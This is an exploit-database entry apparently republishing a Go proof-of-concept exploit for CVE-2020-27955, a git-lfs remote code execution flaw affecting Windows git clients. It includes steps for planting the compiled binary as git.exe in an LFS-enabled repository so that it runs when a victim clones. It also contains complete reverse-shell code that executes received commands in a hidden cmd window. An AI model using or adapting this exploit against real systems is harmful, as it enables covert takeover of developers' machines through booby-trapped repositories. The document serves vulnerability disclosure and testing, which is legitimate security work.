git-lfs Remote Code Execution

2020-11-06T00:00:00
ID PACKETSTORM:159923
Type packetstorm
Reporter Dawid Golunski
Modified 2020-11-06T00:00:00

Description

                                        
                                            `/*  
Go PoC exploit for git-lfs - Remote Code Execution (RCE)  
vulnerability CVE-2020-27955  
git-lfs-RCE-exploit-CVE-2020-27955.go  
  
Discovered by Dawid Golunski  
https://legalhackers.com  
https://exploitbox.io  
  
  
Affected (RCE exploit):  
Git / GitHub CLI / GitHub Desktop / Visual Studio / GitKraken /  
SmartGit / SourceTree etc.  
Basically the whole Windows dev world which uses git.  
  
Usage:  
Compile: go build git-lfs-RCE-exploit-CVE-2020-27955.go  
Save & commit as git.exe  
  
The payload should get executed automatically on git clone operation.  
It spawns a reverse shell, or a calc.exe for testing (if it  
couldn't connect).  
  
An lfs-enabled repository with lfs files may also be needed so that git-lfs  
gets invoked. This can be achieved with:  
  
git lfs track "*.dat"  
echo "fat bug file" > lfsdata.dat  
git add .*  
git add *  
git commmit -m 'git-lfs exploit' -a  
  
Check out the full advisory for details:  
  
https://exploitbox.io/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955.html  
  
https://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.html  
  
PoC video at:  
https://youtu.be/tlptOf9w274  
  
** For testing purposes only **  
  
  
*/  
  
package main  
import (  
"net"  
"os/exec"  
"bufio"  
"syscall"  
)  
  
  
func revsh(host string) {  
  
c, err := net.Dial("tcp", host)  
if nil != err {  
// Conn failed  
if nil != c {  
c.Close()  
}  
// Calc for testing purposes if no listener available  
cmd := exec.Command("calc")  
cmd.Run()  
return  
}  
  
r := bufio.NewReader(c)  
for {  
runcmd, err := r.ReadString('\n')  
if nil != err {  
c.Close()  
return  
}  
cmd := exec.Command("cmd", "/C", runcmd)  
cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}  
out, _ := cmd.CombinedOutput()  
c.Write(out)  
}  
}  
  
// Connect to netcat listener on local port 1337  
func main() {  
revsh("localhost:1337")  
}  
  
  
--   
Regards,  
Dawid Golunski  
https://legalhackers.com  
https://ExploitBox.io  
t: @dawid_golunski  
  
  
`